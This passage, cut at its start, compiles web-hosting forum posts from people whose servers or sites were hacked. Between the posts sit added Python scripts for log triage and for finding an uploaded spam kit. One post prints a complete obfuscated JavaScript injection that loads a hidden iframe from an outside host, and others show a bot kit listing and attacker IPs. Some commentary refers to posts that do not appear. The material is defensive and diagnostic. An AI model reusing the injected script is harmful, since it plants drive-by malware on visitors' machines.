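    ip = ".".join(reversed(name.replace(".in-addr.arpa", "").split(".")))
    try:
        host, _, _ = socket.gethostbyaddr(ip)
        return [host + "."]
    except (socket.herror, socket.gaierror):
        return []


def live_a_lookup(hostname):
    import socket
    try:
        return sorted({ai[4][0] for ai in socket.getaddrinfo(hostname.rstrip("."), None)})
    except socket.gaierror:
        return []


if __name__ == "__main__":
    for ip in ("10.20.30.40", "10.20.30.41", "10.20.30.42"):
        print(ip, fcrdns_check(ip, table_ptr_lookup, table_a_lookup))
    # Live:  fcrdns_check("203.0.113.25", live_ptr_lookup, live_a_lookup)
```

The three sample addresses show the three outcomes a receiver distinguishes: a PTR that resolves back (accepted), no PTR at all (the common reason outbound mail is scored as spam), and a PTR that exists but does not resolve back to the sending IP (treated as no better than missing by most filters).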
Website Hacked
So I'm interviewing with a company and when I typed in the URL to their website, I was met with a nasty surprise: a "hacked by so and so" message! However, after looking closer, I see that I had accidentally appended a period (".") to the end of the domain name, for example: http://www.example.com./

When I removed the period, the site appeared as normal. I don't know anything about the server other than it's IIS. Is there anything I can suggest to them when I go in to interview? I'd like to point this out to them; it may even help my chances at landing the job! (It's not related to networking, though.)

WHMCS Hacked
Now, first of all... I'm not sure if this is a problem with WHMCS or some other piece of software with a security hole, but I thought I should post here.

Our WHMCS got hacked earlier today and the hacker sent out an email to all clients that was, to be honest, unacceptable; I won't go into detail but let's just say it directly insulted them.

Now apart from ruining our reputation and client relationships, I am now completely paranoid that it will happen again. I'd also like to know how it happened in the first place. The hacker signed up for a hosting account, and then sent the email. I have no idea how he/she did it, but when I look at the admin log in WHMCS, it shows the username "hacked" as logging in (see image).http://img378.imageshack.us/img378/2560/hackedmh9.png

Just a warning to everyone out there. His IP address was 86.132.228.82.

SITE WAS HACKED!
A client's site was hacked last week and spyware or some kind of trojan was put on it. I found some files that didn't belong in the images folder and proceeded to delete them, however, when I submitted the site back to Google for review, the report came back saying there was still malware on the site. They didn't provide me with the location of the spyware, so what can I do to find it and delete it?

We Were Hacked, Where Do We Start.
we have a vps server and someone did what I would call a calling card attack, thankfully.

It is a stock kubuntu os with stock apache. Root passwords for everything have been changed to our own

Somehow they logged into kubuntu as root and changed the htpasswd in usr/passwords (changed to protect the password).

Then since they changed the htpasswd they were able to log into phpmyadmin and changed the admin password in the database.

I'm pretty sure I know who did it, and he is teaching us a lesson, which I respect, but he will not communicate with us.

We have hourly snapshots of our vps and we need to know how they are getting in. See my sig and click on the hotspot login.

Looking at the sudoers there is the Defaults line that we suspect as a means to get in.

We have a great php etc... app but it is either Apache or kubuntu that they can get in.

I would like to learn about what needs to be done about security but where do I start?

Can someone help me look for something that would allow the attack?

I'm a php guy and it is not a mysql injection attack nor is it an xss attack.

I am not a kubuntu / server security guy and now need your advice.

Hacked VPS
I am renting a 384 MB Plesk VPS, have 1 client website on it, and it was hacked. Someone set up a new user with root access and was attacking other networks, including dictionary attacks. My host has cleaned up the mess. I suspect access was gained through a weak password choice or through a WordPress hack.

The client website ran a php/mysql survey script sometimes with 20-25 simultaneous users, and about 5-10% were unable to complete the survey due to screen freeze up or time outs. I'm trying to get to the bottom of these errors and know that some of the problems were client side but could the attacks also have affected connectivity & website performance?

My Site Has Been Hacked
One of my clients has just sent me a bounced email to an address she had never heard of. This made me suspect my server had been hacked and was being used for a scam.

Sure enough, I found a file in one of my folders, that was related to a Bank of America scam.

I have since put a password on this folder. But does anyone have any advice on how to secure the site to prevent this happening again? It is a shopping cart and the 'rogue' file was in the admin area of the shopping cart.

My Server Seems Be Hacked
Someone has claimed that he has penetrated my server and has gathered some kind of information via shell access. I have disabled the possible ways of shell access for the users via Tweak Settings and php.ini.

- How can I check whether he has made a backdoor for himself or not?
I have also run a trojan check via Scan for Trojan Horses in WHM, and it has found about 200 possible trojans.

- How can I remove them?

Was My Server Being Hacked ?
217.67.250.41 - - [18/May/2009:15:36:08 +0100] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 226 "-" "-"

What does it mean? Sorry to ask for a fast answer. I have changed my domain's IP to prevent anyone from running a dangerous script...

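The error-log lines in the "Am I Hacked" post above and the access-log line in this post are the same kind of evidence: requests for things that were never on the server. The paths say what was being hunted. adxmlrpc.php and the phpAdsNew/adserver directories are the XML-RPC endpoint and install paths of the phpAdsNew ad server; _vti_bin and MSOffice are FrontPage / Office Server Extensions paths; and "w00tw00t.at.ISC.SANS.DFind" is the fixed request string of the DFind scanner, which Apache rejected here with a 400. The "Invalid URI in request" lines carry fragments of request headers (a cookie, an Accept-Encoding value), i.e. a client that sent header lines where the request line should be; those are malformed requests, not a working exploit. None of these lines show success; a scan that finds nothing logs exactly this. As an added example, not from either post, the parser below reads both log formats, groups hits by client IP and labels each IP by the probe families it matched and by how many distinct missing paths it asked for. The sample lines are constructed from the ones quoted in the two posts plus one benign request.

```python
import re
from collections import defaultdict

ERROR_LINE = re.compile(
    r"^(?:\[(?P<ts>[^\]]+)\]\s+)?\[error\]\s+\[client (?P<ip>[\d.]+)\]\s+(?P<msg>.*)$")
MISSING_PATH = re.compile(
    r"^(?:File does not exist: (?P<p1>\S+)|script '(?P<p2>[^']+)' not found)")
ACCESS_LINE = re.compile(
    r'^(?P<ip>[\d.]+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3})')

# Probe fingerprints seen in the two posts: a lower-cased path substring and
# what the requester is looking for.
FINGERPRINTS = {
    "w00tw00t.at.isc.sans.dfind": "DFind scanner probe",
    "adxmlrpc.php": "phpAdsNew/OpenX XML-RPC endpoint",
    "phpadsnew": "phpAdsNew installation",
    "_vti_bin": "FrontPage Server Extensions",
    "msoffice": "Office Server Extensions",
}


def parse_line(line):
    """Normalise one error-log or access-log line to (ip, kind, detail).
    kind is 'missing', 'invalid_uri', 'other' or 'request'; None if unparsed."""
    m = ERROR_LINE.match(line)
    if m:
        msg = m.group("msg")
        mm = MISSING_PATH.match(msg)
        if mm:
            return m.group("ip"), "missing", mm.group("p1") or mm.group("p2")
        prefix = "Invalid URI in request"
        if msg.startswith(prefix):
            return m.group("ip"), "invalid_uri", msg[len(prefix):].strip()
        return m.group("ip"), "other", msg
    m = ACCESS_LINE.match(line)
    if m:
        return m.group("ip"), "request", (m.group("path"), int(m.group("status")))
    return None


def triage(lines, scanner_threshold=4):
    """Group events per client IP and label each IP with the probe families it
    matched, whether it asked for enough distinct nonexistent paths to look
    like a scanner, and how many malformed request lines it sent."""
    per_ip = defaultdict(lambda: {"missing": set(), "invalid_uri": 0,
                                  "fingerprints": set(), "status_400": 0})
    for line in lines:
        parsed = parse_line(line)
        if not parsed:
            continue
        ip, kind, detail = parsed
        rec = per_ip[ip]
        path = None
        if kind == "missing":
            rec["missing"].add(detail)
            path = detail
        elif kind == "invalid_uri":
            rec["invalid_uri"] += 1
        elif kind == "request":
            path, status = detail
            if status == 400:
                rec["status_400"] += 1
        if path:
            lowered = path.lower()
            for needle, label in FINGERPRINTS.items():
                if needle in lowered:
                    rec["fingerprints"].add(label)
    result = {}
    for ip, rec in per_ip.items():
        result[ip] = {
            "distinct_missing_paths": len(rec["missing"]),
            "looks_like_scanner": len(rec["missing"]) >= scanner_threshold or bool(rec["fingerprints"]),
            "fingerprints": sorted(rec["fingerprints"]),
            "malformed_requests": rec["invalid_uri"] + rec["status_400"],
        }
    return result


# Constructed sample reproducing the shape of the lines quoted in the posts.
SAMPLE_LOG = """\
[error] [client 195.23.16.24] File does not exist: /var/www/html/a1b2c3d4e5f6g7h8i9
[error] [client 195.23.16.24] script '/var/www/html/adxmlrpc.php' not found or unable to stat
[error] [client 195.23.16.24] File does not exist: /var/www/html/adserver
[error] [client 195.23.16.24] File does not exist: /var/www/html/phpAdsNew
[error] [client 195.23.16.24] File does not exist: /var/www/html/ads
[error] [client 71.190.229.120] File does not exist: /var/www/html/_vti_bin
[error] [client 71.190.229.120] File does not exist: /var/www/html/MSOffice
[Tue May 22 16:09:24 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:29:29 2007] [error] [client 129.29.227.4] Invalid URI in request f705120b3663bb; yab_logined=0; yab_uid=0
217.67.250.41 - - [18/May/2009:15:36:08 +0100] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 226 "-" "-"
10.0.0.5 - - [18/May/2009:15:40:00 +0100] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for ip, verdict in sorted(triage(SAMPLE_LOG).items()):
        print(ip, verdict)
```

Feed it real error_log and access_log lines together (`triage(open("error_log").readlines() + open("access_log").readlines())`); an IP that only appears with a handful of 404s for paths the site really has is noise, while one hitting many distinct missing paths or a known fingerprint is a scanner, and the interesting follow-up is whether that same IP ever got a 200 for a path it should not have.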
My Server Hacked?
My dedicated server was rather slow. Upon checking, I had a new cron job (deleted now) made by apache, pointing to the following IRC bot.

[root@server50040 tmp]# cd .LiveZone/
[root@server50040 .LiveZone]# ls -al
total 384
drwxr-xr-x 10 apache apache 4096 Dec 21 12:17 .
drwxrwxrwt 3 root root 4096 Dec 21 12:15 ..
-rwxr-xr-x 1 apache apache 320 Dec 9 2004 config
-rw------- 1 apache apache 1002 Dec 9 2004 config.h
-rw-rw-r-- 1 apache apache 55 Dec 20 22:55 cron.d
-rwxr-xr-x 1 apache apache 347 Dec 9 2004 ****
drwxr-xr-x 2 apache apache 12288 May 31 2002 help
-rwxr-xr-x 1 apache apache 210216 Dec 9 2004 httpd
drwxr-xr-x 2 apache apache 4096 Jan 12 2002 lang
-rw------- 1 apache apache 492 Dec 21 12:17 livezone
-rw-rw-r-- 1 apache apache 19 Dec 20 22:55 livezone.dir
-rw------- 1 apache apache 492 Dec 21 12:09 livezone.old
drwxr-xr-x 2 apache apache 4096 Dec 21 12:10 log
-rw-r--r-- 1 apache apache 2137 Sep 26 2003 Makefile
-rw-r--r-- 1 apache apache 731 Dec 9 2004 makefile.out
-rwxr-xr-x 1 apache apache 15090 Dec 9 2004 makesalt
drwxr-xr-x 3 apache apache 4096 Jul 30 2000 menuconf
drwxr-xr-x 2 apache apache 4096 Jul 17 2000 motd
-rwxr-xr-x 1 apache apache 14306 Nov 13 2003 proc
-rw------- 1 apache apache 6 Dec 21 12:10 psybnc.pid
-rw-r--r-- 1 apache apache 10780 Dec 9 2004 README
-rwxr-xr-x 1 apache apache 68 Jun 4 2004 run
drwxr-xr-x 2 apache apache 4096 Dec 9 2004 scripts
drwxr-xr-x 2 apache apache 4096 Dec 9 2004 src
-rw------- 1 apache apache 3901 Jan 12 2002 targets.mak
drwxr-xr-x 2 apache apache 4096 Dec 9 2004 tools
-rwxr--r-- 1 apache apache 21516 Sep 25 2002 xh
-rwxrw-r-- 1 apache apache 194 Dec 20 22:55 y2kupdate

Server Hacked ...
My server was hacked some time ago. I've changed passwords and scanned system for viruses, but found nothing.

Now I'm looking into the log file /var/log/messages and I have a few questions:

1. There are a lot of messages like: Apr 2 02:53:09 host
sshd(pam_unix)[29398]: authentication failure; logname= uid=0 euid=0 tty=ssh
ruser= rhost=203.196.151.235

Do these messages mean that hacker trying to enter the server under root?

2. There are messages like these:
Apr 2 03:56:10 host clamd[4678]: stream 1255: Worm.SomeFool.P.2 FOUND
Apr 2 10:46:10 host clamd[4678]: stream 2008: Worm.Bagle.pwd-eml FOUND

What does this mean? Virus on my server or something else?

3. Also, I can see a lot of messages like this one:
Apr 2 09:38:40 host clamd[4678]: stream 1111: Email.Phishing.RB-524 FOUND

Does someone read my emails?

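This post and the "Hacked? Or Not" post above ask the same thing of the same log: did an SSH login from an unfamiliar IP succeed? The pam_unix line quoted here is a failure; its uid=0 euid=0 describe the sshd process doing the check, not a root login, and since the line carries no user= field the account tried is not recorded on it. Success shows up as an "Accepted <method> for <user> from <ip>" line from sshd; "Failed password", "Invalid user" and the pam_unix failures are the attempts that did not get in. The last-login banner comes from wtmp, which an intruder with root can edit, so the auth log (ideally a copy shipped off the box) is the record to trust. The clamd "stream N: ... FOUND" lines are the virus scanner reporting infected content in data streamed to it, typically mail passing through the filter, which is why the example below ignores them. The added script (not from either post) summarises sshd authentication outcomes per source IP; the sample lines are constructed around the IPs and times the two posters quoted, and the Accepted line is invented to show the contrast.

```python
import re
from collections import defaultdict

# syslog prefix plus the sshd / pam_unix message shapes that matter.
SYSLOG = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) (?P<prog>[^\[:]+)(?:\[\d+\])?: (?P<msg>.*)$")
ACCEPTED = re.compile(r"^Accepted (?P<method>\S+) for (?P<user>\S+) from (?P<ip>[\d.]+)")
FAILED = re.compile(r"^Failed (?P<method>\S+) for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)")
INVALID_USER = re.compile(r"^Invalid user (?P<user>\S+) from (?P<ip>[\d.]+)")
PAM_FAIL = re.compile(r"authentication failure;.*?rhost=(?P<ip>[\d.]*)(?:\s+user=(?P<user>\S+))?")


def parse_event(line):
    """Return (ip, outcome, user) for an sshd authentication line, else None.
    outcome is 'accepted', 'failed' or 'invalid_user'; user may be None."""
    m = SYSLOG.match(line)
    if not m or not m.group("prog").startswith("sshd"):
        return None
    msg = m.group("msg")
    for rx, outcome in ((ACCEPTED, "accepted"), (FAILED, "failed"), (INVALID_USER, "invalid_user")):
        mm = rx.match(msg)
        if mm:
            return mm.group("ip"), outcome, mm.group("user")
    mm = PAM_FAIL.search(msg)
    if mm and mm.group("ip"):
        return mm.group("ip"), "failed", mm.group("user")
    return None


def summarize(lines, trusted_ips=()):
    """Per source IP: failed attempts, accepted logins (with the accounts),
    and the usernames tried.  Also returns the accepted logins from IPs not
    in trusted_ips, which is the actual 'was I intruded' answer."""
    per_ip = defaultdict(lambda: {"failed": 0, "accepted": [], "usernames": set()})
    for line in lines:
        ev = parse_event(line)
        if not ev:
            continue
        ip, outcome, user = ev
        rec = per_ip[ip]
        if user:
            rec["usernames"].add(user)
        if outcome == "accepted":
            rec["accepted"].append(user)
        else:
            rec["failed"] += 1
    report = {ip: {"failed": r["failed"], "accepted": r["accepted"],
                   "usernames": sorted(r["usernames"])} for ip, r in per_ip.items()}
    intrusions = {ip: r["accepted"] for ip, r in report.items()
                  if r["accepted"] and ip not in trusted_ips}
    return report, intrusions


# Constructed sample modelled on the two posts.  The first three lines use the
# IP quoted in this post, the next two the IP and time from the lfd alert;
# the Accepted line and 198.51.100.7 are invented.
SAMPLE = """\
Apr  2 02:53:09 host sshd(pam_unix)[29398]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=203.196.151.235
Apr  2 02:53:11 host sshd[29398]: Failed password for root from 203.196.151.235 port 4021 ssh2
Apr  2 02:53:15 host sshd[29401]: Invalid user oracle from 203.196.151.235
May 10 01:31:50 host sshd[1200]: Failed password for root from 207.210.233.128 port 51022 ssh2
May 10 01:31:52 host sshd[1200]: Failed password for root from 207.210.233.128 port 51022 ssh2
May 10 09:02:10 host sshd[1377]: Accepted publickey for admin from 198.51.100.7 port 40122 ssh2
May 10 09:05:00 host clamd[4678]: stream 1111: Email.Phishing.RB-524 FOUND
""".splitlines()

if __name__ == "__main__":
    report, intrusions = summarize(SAMPLE, trusted_ips={"198.51.100.7"})
    for ip, r in sorted(report.items()):
        print(ip, r)
    print("accepted logins from untrusted IPs:", intrusions)
```

On a real host run it over /var/log/secure or /var/log/auth.log (whichever the distribution uses) with your own addresses in trusted_ips; an empty intrusions dict with a long failed count is the ordinary brute-force background, while any entry in it is a session to investigate.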
New Server Hacked
My server just got hacked i just bought it!!

and they were going to charge me another $35 to reset the password, how stupid...

in the end we got it done free

SwiftNIC Hacked?
Does any of you know what actually happened with SwiftNic servers?

My site (www.wincert.net) has been inaccessible for almost 20 hours now and I haven't got a reply from my host! I was located on a semi-dedicated server.

I've only got this mail about 12 hours ago:

Dear customers,

We have discovered that our WHMCS client database may have been compromised in the last 48 hours. While important information such as credit card data is encrypted it is possible that your password or your server login (if mentioned in a support ticket) may have been exposed.
We encourage all customers to change their billing and Server login passwords ASAP.

We are still investigating this incident so we can identify any possible weaknesses of our internal systems and take appropriate steps to maximize the security of your information.
Please let us know if you have any questions or need any assistance

regards
Swiftnic

Who should I call, talk to, or ask for help, 'cause I really need my site back ASAP?

How Do Websites Get Hacked?
Every now and then I'll run into a website that has a message that says it was hacked by a certain hacker. How exactly do they do this? Do they hack into the actual server or do they somehow get hold of the website owner's FTP info?

Blog Got Hacked
One of my WordPress blogs got hacked and my site is redirecting to a different site.... When I check phpMyAdmin, there is another SQL server that I am not familiar with... and there are around 17 tables... I cannot delete the tables... I already contacted my host and am still waiting for a response...

The installed database is "information_schema (17)"

Are you familiar with this?

Has Ipower Been Hacked?
I've had a Ipower hosting account since 2002 and recently even renewed both my service and domain registration.

I recently noticed that a small/odd JavaScript statement had been added to the bottom of my page and I didn't add it. I noticed this after visiting my page, when my antivirus alerted me to 'HTML/Dldr.Iframe.DP [virus]', apparently some type of iframe redirect via this script to download malware.

After googling around about "HTML/Dldr.Iframe.DP [virus]" I found another person who has an ipower account mentioning the exact same problem on their site.

Does anybody know anything about this?

Has anybody heard anything about ipower sites being recently hacked or something?

How and why has this happened? Is my site just special and am I lucky? Or has this recently also happened to other ipower accounts too?

I've contacted ipower but expect some generic response of no real help.

Most importantly, should I go through my few pages, which comprise in fact my quite small site, and check to see if they also have been hacked with malicious JavaScript code? Should I upload new pages? Change my password?

All of my content looks OK and in place, no pages defaced except apparently this small insertion of malicious JavaScript code at the bottom of my main index page.

I have pasted just the basic fragment of the code below:

<script>eval(unescape("%77%69%6e%64%6f .....

Site Up And Down- Am I Being Hacked
My site keeps going down every 10 minutes. It'll be online for 10 minutes, then down for another 10 minutes. It's been happening for like the past 3-4 hours. I can log into WHM without any problems, but the site itself keeps crashing!

And last week somehow I found this code in all my index and home pages. Not in any of my other pages like food.html or sleep.php, just the index.php and home.html type of pages.

Quote:

<script type="text/javascript" src="swfobject.js"></script>

<body><script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,114,34,59,118,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,39,43,39,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52,52,59,125,32,118,97,114,32,109,110,98,113,61,52,51,48,52,49,56,50,52))</script>
</body>
</html>

What the heck is going on?

Server Hacked
My server was hacked the night before last and here is the log:

Oct 28 10:30:47 server1 [19705]: connection from "173.45.118.58"
Oct 28 10:30:47 server1 [19705]: User root's local password accepted.
Oct 28 10:30:47 server1 [19705]: Password authentication for user root accepted.
Oct 28 10:30:47 server1 [19705]: User root, coming from 3a.76.2d.[url], authenticated.

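
An added example, not from either post above, that reads the two log formats quoted in them: the pam_unix "authentication failure ... rhost=" lines from /var/log/messages, and the "connection from" / "Password authentication for user root accepted" pairs. It answers the first poster's question 1 with numbers instead of a guess: how many failures per source address, which accounts were tried, and whether a root password login was actually accepted and from where. Note that uid=0 euid=0 in the pam_unix line describe the sshd process doing the check, not the attacker; the account being tried, when it exists, appears as a trailing user= field. The extra failure lines and the 198.51.100.7 address are constructed for the sample.

```python
import re
from collections import Counter, defaultdict

# Sample input: the pam_unix line and the "password accepted" lines quoted in
# the two posts above, plus constructed extra failures (198.51.100.7 is a
# documentation address) so that per-source counting has something to count.
SAMPLE_LOG = """\
Apr 2 02:53:09 host sshd(pam_unix)[29398]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=203.196.151.235
Apr 2 02:53:12 host sshd(pam_unix)[29401]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=203.196.151.235 user=root
Apr 2 02:53:15 host sshd(pam_unix)[29404]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=203.196.151.235 user=admin
Apr 2 02:54:01 host sshd(pam_unix)[29410]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=198.51.100.7 user=root
Oct 28 10:30:47 server1 [19705]: connection from "173.45.118.58"
Oct 28 10:30:47 server1 [19705]: User root's local password accepted.
Oct 28 10:30:47 server1 [19705]: Password authentication for user root accepted.
"""

# uid/euid in the pam_unix line belong to the checking sshd process, not to the
# account being tried; that account, when it exists, is the trailing user=.
FAIL_RE = re.compile(
    r"sshd\(pam_unix\)\[\d+\]: authentication failure;.*?"
    r"rhost=(?P<rhost>\S+)(?:\s+user=(?P<user>\S+))?"
)
CONN_RE = re.compile(r"\[(?P<pid>\d+)\]: connection from \"(?P<ip>[\d.]+)\"")
ACCEPT_RE = re.compile(r"\[(?P<pid>\d+)\]: Password authentication for user (?P<user>\S+) accepted")


def failures_by_source(log):
    """Count failed logins per remote host and collect the usernames tried."""
    counts, users = Counter(), defaultdict(set)
    for line in log.splitlines():
        m = FAIL_RE.search(line)
        if m:
            counts[m["rhost"]] += 1
            if m["user"]:
                users[m["rhost"]].add(m["user"])
    return counts, dict(users)


def accepted_password_logins(log):
    """Pair each accepted password login with the 'connection from' line that
    carries the same sshd pid, so the source address is known."""
    source, hits = {}, []
    for line in log.splitlines():
        m = CONN_RE.search(line)
        if m:
            source[m["pid"]] = m["ip"]
            continue
        m = ACCEPT_RE.search(line)
        if m:
            hits.append((m["user"], source.get(m["pid"], "unknown")))
    return hits


def triage(log, threshold=3):
    """The findings a responder acts on first."""
    counts, users = failures_by_source(log)
    return {
        "brute_force_sources": [h for h, n in counts.most_common() if n >= threshold],
        "users_tried": users,
        "root_password_logins": [h for u, h in accepted_password_logins(log) if u == "root"],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print(key, value)
```

A burst of failures from one address is background noise on any Internet-facing sshd; an accepted password login for root from an address you do not recognise is the line that turns "was I hacked?" into "yes, at 10:30:47 from 173.45.118.58", and from there the next step is the wtmp/lastlog and shell history for that session.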
Website Has Been Hacked
Just this week, I believe one of my sites has been hacked... or potentially my whole server! When accessing the website (a vBulletin forum), instead of going to the main page, we get a screen that looks like Windows' "My Computer" and there is a scan running. Firefox has blocked the site on suspicion.

I am stumped. Where to begin? I have full SSH access to my server (after rebooting it). Thank you in advance.

Server: CentOS Linux 4.3

Ecatel Hacked
Quick quote from what I got from a friend on MSN:

Quote:

[3:08] @(garrett) Hey Sean
[3:08] @(garrett) Do we know whats going on yet?
[3:09] @(Sean) no
[3:09] @(Sean) ecatel is confused right now
[3:09] @(Sean) hackers may have access to more than helpdesk
[3:10] @(garrett) :/

And from my other friend on MSN:

Quote:

ViSiOn says:

I woke up today to find e-mails from the help desk asking for all our servers to get wiped and formatted... so I'm going to have a few 1000 pissed clients.
ViSiOn says:

All my account info was changed too. I can't do anything. And I can't even reach Ecatel via e-mail without my tickets getting deleted.

Site Is Hacked
I got a problem that I could not understand. When I access my site, everything looks fine (from Japan). But other people who come from Vietnam, Singapore... cannot, and it shows a homepage like this:

[url]

Servage Hacked
We've been hacked, again. By we, I mean many, many Servage clients as far as I can tell. Unlike past JavaScript injections, this time it is much more serious, at least to me anyhow. Here is what I know:

Somehow, someone has gained full access to my (and again, many others') control panel on servage.net.

While on there, they have generously created their own ftp accounts with full access.

Every website I host with Servage had a number of files uploaded to it.

These files consisted of one or more .htaccess files that contained a number of rewrites pointing to the other files they uploaded.

The new files were actually cleverly hidden inside other directories where they would go unnoticed. For example, on some of my sites that have forums, they were put into /forum/include/tmp/(bogus files), and in my galleries, put into such directories as /images/photos/(bogus files).

The files themselves are as follows:
a .htaccess file
css.js
keys.txt
links.txt
main.php
texts.txt
and tpl.php

The links.txt file itself is over 1.9 MB and contains links to hundreds of other infected Servage-hosted websites (I have checked at least 30 of them in whois.org and found all are hosted at Servage).

Here is an example of the links.txt file:
chipandachair.co.uk/language/include/include/topic~3312.html|black break spring
chipandachair.co.uk/language/include/include/topic~1562.html|free exploited black teens
ra4prints.co.uk/inc/forum/style/group~190.html|nudist photographys
ra4prints.co.uk/inc/forum/style/group~3827.html|my nudist links
And so on and so forth.

keys.txt is a giant list of pornographic phrases and texts.txt is just random phrases in general.

I have contacted Servage about this multiple times and have gotten their basic cookie-cutter response of please remove the files from all your websites, change all your passwords and delete the new FTP accounts created. I asked them point blank if they've been hacked and they've continued to say no.

If you are a Servage customer, make SURE you log into your control panel RIGHT NOW and check to see if new FTP accounts have been created. After that, look at your website statistics, click on DISPLAYED PAGES and look for odd entries like /blabla.html/links?12982.html or some such thing, and pay attention to where the link is showing up (what directory), which will help you remove all of the crap someone put on there.

This is very serious guys... as I said, someone had full access to my control panel. With that, they could enter into any of my SQL databases, fully see all the passwords to each database (as Servage kindly shows your password to anyone when you click on connection information), not to mention any sensitive customer data I may have had stored in my databases.

This hack also kills your website in a number of ways:

1) It tries to redirect any page on your site to the index.php uploaded to your site, which then directs you to porn sites.

2) This hack spams over 3000 links to Google every day, coming from your website, leading to sites that are deemed bad by Google. This ruins your page rank and your site, as some of mine have since I missed this latest attack for 2 weeks, will go down the drain.

3) When someone googles your website, it will come up with tons of porn links. My daughter's site was one of the infected ones... she's 9, and when you look up her site it shows that it goes to porn.

Let me know if you've been targeted as well and what we, if anything, can do about it. Servage NEEDS to admit they've been hacked; in fact, the damage to my businesses because of their failure to notify me of these events seems like it should be on their shoulders.

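
An added example (not the poster's or Servage's code) that automates the two checks the post above recommends doing by hand: walk a document root for directories holding the kit's file names (.htaccess, css.js, keys.txt, links.txt, main.php, texts.txt, tpl.php) wherever they were buried, and parse links.txt, whose lines have the host/path|keyword shape shown in the post, into a count of doorway URLs per host so the other affected sites can be listed and notified. A lone .htaccess is normal, so a directory is only reported when several of the names appear together. The sample tree, the kit contents and the example-a/example-b hostnames are constructed; the real links.txt points at real sites.

```python
import os
import tempfile

# File names the post lists as the uploaded kit.
KIT_FILES = {".htaccess", "css.js", "keys.txt", "links.txt",
             "main.php", "texts.txt", "tpl.php"}


def find_kit_dirs(root, min_hits=3):
    """Directories holding at least min_hits of the kit's file names.
    .htaccess alone is normal; main.php + tpl.php + links.txt together is not."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        hits = KIT_FILES.intersection(files)
        if len(hits) >= min_hits:
            found.append((os.path.relpath(dirpath, root), sorted(hits)))
    return sorted(found)


def parse_links_file(text):
    """links.txt lines have the form 'host/path|keyword'. Returns
    {host: number of doorway URLs}, i.e. the other infected sites."""
    hosts = {}
    for line in text.splitlines():
        if "|" not in line:
            continue
        host = line.split("|", 1)[0].strip().split("/", 1)[0].lower()
        if host:
            hosts[host] = hosts.get(host, 0) + 1
    return hosts


def scan(root):
    """Where the kit sits, and which other hosts each copy links to."""
    report = []
    for rel, files in find_kit_dirs(root):
        hosts = {}
        if "links.txt" in files:
            path = os.path.join(root, rel, "links.txt")
            with open(path, encoding="utf-8", errors="replace") as fh:
                hosts = parse_links_file(fh.read())
        report.append({"dir": rel, "files": files, "linked_hosts": hosts})
    return report


def build_sample_tree():
    """Constructed docroot mirroring the post: clean site files plus one kit
    buried in forum/include/tmp/. Kit contents and the hostnames in
    links.txt are made up for the example."""
    root = tempfile.mkdtemp()

    def put(rel, text):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(text)

    put("index.php", "<?php echo 'home'; ?>\n")
    put(".htaccess", "RewriteEngine On\n")          # one hit only: legitimate
    put("forum/index.php", "<?php echo 'forum'; ?>\n")
    kit = "forum/include/tmp/"
    for name in ("main.php", "tpl.php", "css.js", "keys.txt", "texts.txt"):
        put(kit + name, "placeholder\n")
    put(kit + ".htaccess", "RewriteEngine On\nRewriteRule .* main.php [L]\n")
    put(kit + "links.txt",
        "example-a.invalid/language/include/include/topic~3312.html|keyword one\n"
        "example-a.invalid/language/include/include/topic~1562.html|keyword two\n"
        "example-b.invalid/inc/forum/style/group~190.html|keyword three\n")
    return root


if __name__ == "__main__":
    for entry in scan(build_sample_tree()):
        print(entry)
```

Run scan() against each site's document root after the FTP accounts have been removed and the passwords changed; deleting the files first and rotating credentials second leaves the attacker a window to put them back.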
Somebody Hacked My Server ...
I found a process /usr/sbin/httpd running as nobody, then I did a trace in WHM and found this. Is my server hacked?

send(4, "@206113irc10quakenet3org1"..., 34, MSG_NOSIGNAL) = 34
poll([{fd=4, events=POLLIN, revents=POLLIN}], 1, 5000) = 1
ioctl(4, FIONREAD, [162]) = 0
recvfrom(4, "@2062012001103irc10quakenet3org1"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("72.36.191.2")}, [16]) = 162
close(4) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
ioctl(4, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbffb3718) = -1 EINVAL (Invalid argument)
_llseek(4, 0, 0xbffb3770, SEEK_CUR) = -1 ESPIPE (Illegal seek)
ioctl(4, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbffb3718) = -1 EINVAL (Invalid argument)
